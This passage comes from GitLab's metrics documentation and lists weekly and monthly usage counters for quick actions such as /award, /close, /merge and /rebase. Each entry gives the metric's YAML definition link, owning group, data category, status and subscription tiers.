+ +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181510_i_quickactions_assign_single_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_award_monthly` + +Count of MAU using the `/award` quick action to set an award emoji on an issuable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181527_i_quickactions_award_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_award_weekly` + +Count of WAU using the `/award` quick action to set an award emoji on an issuable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181525_i_quickactions_award_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_board_move_monthly` + +Count of MAU using the `/board_move` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181530_i_quickactions_board_move_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_board_move_weekly` + +Count of WAU using the `/board_move` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181529_i_quickactions_board_move_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_child_epic_monthly` + +Count of MAU using the `/child_epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181534_i_quickactions_child_epic_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_child_epic_weekly` + +Count of WAU using the `/child_epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181532_i_quickactions_child_epic_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_clear_weight_monthly` + +Count of MAU using the `/clear_weight` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181538_i_quickactions_clear_weight_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_clear_weight_weekly` + +Count of WAU using the `/clear_weight` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181536_i_quickactions_clear_weight_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_clone_monthly` + +Count of MAU using the `/clone` quick action to clone an issue. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181541_i_quickactions_clone_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_clone_weekly` + +Count of WAU using the `/clone` quick action to clone an issue. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181540_i_quickactions_clone_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_close_monthly` + +Count of MAU using the `/close` quick action to close an issuable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181545_i_quickactions_close_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_close_weekly` + +Count of WAU using the `/close` quick action to close an issuable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181543_i_quickactions_close_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_confidential_monthly` + +Count of MAU using the `/confidential` quick action to set an issue as confidential + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181549_i_quickactions_confidential_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_confidential_weekly` + +Count of WAU using the `/confidential` quick action to set an issue as confidential + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181547_i_quickactions_confidential_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_copy_metadata_issue_monthly` + +Count of MAU using the `/copy_metadata` quick action on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181556_i_quickactions_copy_metadata_issue_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_copy_metadata_issue_weekly` + +Count of WAU using the `/copy_metadata` quick action on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181554_i_quickactions_copy_metadata_issue_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_copy_metadata_merge_request_monthly` + +Count of MAU using the `/copy_metadata` quick action on a Merge Request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181553_i_quickactions_copy_metadata_merge_request_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_copy_metadata_merge_request_weekly` + +Count of WAU using the `/copy_metadata` quick action on a Merge Request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181551_i_quickactions_copy_metadata_merge_request_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_create_merge_request_monthly` + +Count of MAU using the `/create_merge_request` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181600_i_quickactions_create_merge_request_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_create_merge_request_weekly` + +Count of WAU using the `/create_merge_request` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181558_i_quickactions_create_merge_request_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_done_monthly` + +Count of MAU using the `/done` quick action to mark a todo as done + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181604_i_quickactions_done_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_done_weekly` + +Count of WAU using the `/done` quick action to mark a todo as done + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181602_i_quickactions_done_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_draft_monthly` + +Count of MAU using the `/draft` quick action on a Merge Request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181607_i_quickactions_draft_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_draft_weekly` + +Count of WAU using the `/draft` quick action on a Merge Request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181605_i_quickactions_draft_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_due_monthly` + +Count of MAU using the `/due` quick action to change the due date on an issuable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181611_i_quickactions_due_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_due_weekly` + +Count of WAU using the `/due` quick action to change the due date on an issuable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181609_i_quickactions_due_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_duplicate_monthly` + +Count of MAU using the `/duplicate` quick action to mark an issue as a duplicate of another + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181615_i_quickactions_duplicate_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_duplicate_weekly` + +Count of WAU using the `/duplicate` quick action to mark an issue as a duplicate of another + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181613_i_quickactions_duplicate_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_epic_monthly` + +Count of MAU using the `/epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181618_i_quickactions_epic_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_epic_weekly` + +Count of WAU using the `/epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181617_i_quickactions_epic_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_estimate_monthly` + +Count of MAU using the `/estimate` quick action to set a time estimate on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181622_i_quickactions_estimate_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_estimate_weekly` + +Count of WAU using the `/estimate` quick action to set a time estimate on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181620_i_quickactions_estimate_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_invite_email_multiple_monthly` + +Unique users using the /invite_email quick action to add a multiple email participants to an issue within 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210222041235_i_quickactions_invite_email_multiple_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_invite_email_multiple_weekly` + +Unique users using the /invite_email quick action to add a multiple email participants to an issue within 7 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210303154600_i_quickactions_invite_email_multiple_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_invite_email_single_monthly` + +Unique users using the /invite_email quick action to add a single email participant to an issue within 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210222041219_i_quickactions_invite_email_single_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_invite_email_single_weekly` + +Unique users using the /invite_email quick action to add a single email participant to an issue within 7 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210303154557_i_quickactions_invite_email_single_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_iteration_monthly` + +Count of MAU using the `/iteration` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181626_i_quickactions_iteration_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_iteration_weekly` + +Count of WAU using the `/iteration` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181624_i_quickactions_iteration_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_label_monthly` + +Count of MAU using the `/label` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181629_i_quickactions_label_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_label_weekly` + +Count of WAU using the `/label` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181628_i_quickactions_label_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_lock_monthly` + +Count of MAU using the `/lock` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181633_i_quickactions_lock_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_lock_weekly` + +Count of WAU using the `/lock` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181631_i_quickactions_lock_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_merge_monthly` + +Count of MAU using the `/merge` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181637_i_quickactions_merge_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_merge_weekly` + +Count of WAU using the `/merge` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181635_i_quickactions_merge_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_milestone_monthly` + +Count of MAU using the `/milestone` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181641_i_quickactions_milestone_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_milestone_weekly` + +Count of WAU using the `/milestone` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181639_i_quickactions_milestone_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_move_monthly` + +Count of MAU using the `/move` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181644_i_quickactions_move_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_move_weekly` + +Count of WAU using the `/move` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181642_i_quickactions_move_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_parent_epic_monthly` + +Count of MAU using the `/parent_epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181648_i_quickactions_parent_epic_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_parent_epic_weekly` + +Count of WAU using the `/parent_epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181646_i_quickactions_parent_epic_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_promote_monthly` + +Count of MAU using the `/promote` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181652_i_quickactions_promote_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_promote_weekly` + +Count of WAU using the `/promote` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181650_i_quickactions_promote_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_publish_monthly` + +Count of MAU using the `/publish` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181655_i_quickactions_publish_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_publish_weekly` + +Count of WAU using the `/publish` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181654_i_quickactions_publish_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_reassign_monthly` + +Count of MAU using the `/reassign @user1` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181659_i_quickactions_reassign_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_reassign_reviewer_monthly` + +Count of MAU using the `/reassign_reviewer` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181703_i_quickactions_reassign_reviewer_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_reassign_reviewer_weekly` + +Count of WAU using the `/reassign_reviewer` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181701_i_quickactions_reassign_reviewer_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_reassign_weekly` + +Count of WAU using the `/reassign @user1` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181657_i_quickactions_reassign_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_rebase_monthly` + +Count of MAU using the `/rebase` quick action on a Merge Request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181707_i_quickactions_rebase_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_rebase_weekly` + +Count of WAU using the `/rebase` quick action on a Merge Request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181705_i_quickactions_rebase_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_relabel_monthly` + +Count of MAU using the `/relabel` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181710_i_quickactions_relabel_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_relabel_weekly` + +Count of WAU using the `/relabel` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181708_i_quickactions_relabel_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_relate_monthly` + +Count of MAU using the `/relate` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181714_i_quickactions_relate_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_relate_weekly` + +Count of WAU using the `/relate` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181712_i_quickactions_relate_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_child_epic_monthly` + +Count of MAU using the `/remove_child_epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181718_i_quickactions_remove_child_epic_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_child_epic_weekly` + +Count of WAU using the `/remove_child_epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181716_i_quickactions_remove_child_epic_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_due_date_monthly` + +Count of MAU using the `/remove_due_date` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181721_i_quickactions_remove_due_date_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_due_date_weekly` + +Count of WAU using the `/remove_due_date` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181719_i_quickactions_remove_due_date_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_epic_monthly` + +Count of MAU using the `/remove_epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181725_i_quickactions_remove_epic_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_epic_weekly` + +Count of WAU using the `/remove_epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181723_i_quickactions_remove_epic_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_estimate_monthly` + +Count of MAU using the `/remove_estimate` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181729_i_quickactions_remove_estimate_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_estimate_weekly` + +Count of WAU using the `/remove_estimate` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181727_i_quickactions_remove_estimate_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_iteration_monthly` + +Count of MAU using the `/remove_iteration` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181732_i_quickactions_remove_iteration_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_iteration_weekly` + +Count of WAU using the `/remove_iteration` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181731_i_quickactions_remove_iteration_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_milestone_monthly` + +Count of MAU using the `/remove_milestone` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181736_i_quickactions_remove_milestone_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_milestone_weekly` + +Count of WAU using the `/remove_milestone` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181734_i_quickactions_remove_milestone_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_parent_epic_monthly` + +Count of MAU using the `/remove_parent_epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181740_i_quickactions_remove_parent_epic_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_parent_epic_weekly` + +Count of WAU using the `/remove_parent_epic` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181738_i_quickactions_remove_parent_epic_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_time_spent_monthly` + +Count of MAU using the `/remove_time_spent` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181744_i_quickactions_remove_time_spent_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_time_spent_weekly` + +Count of WAU using the `/remove_time_spent` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181742_i_quickactions_remove_time_spent_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### 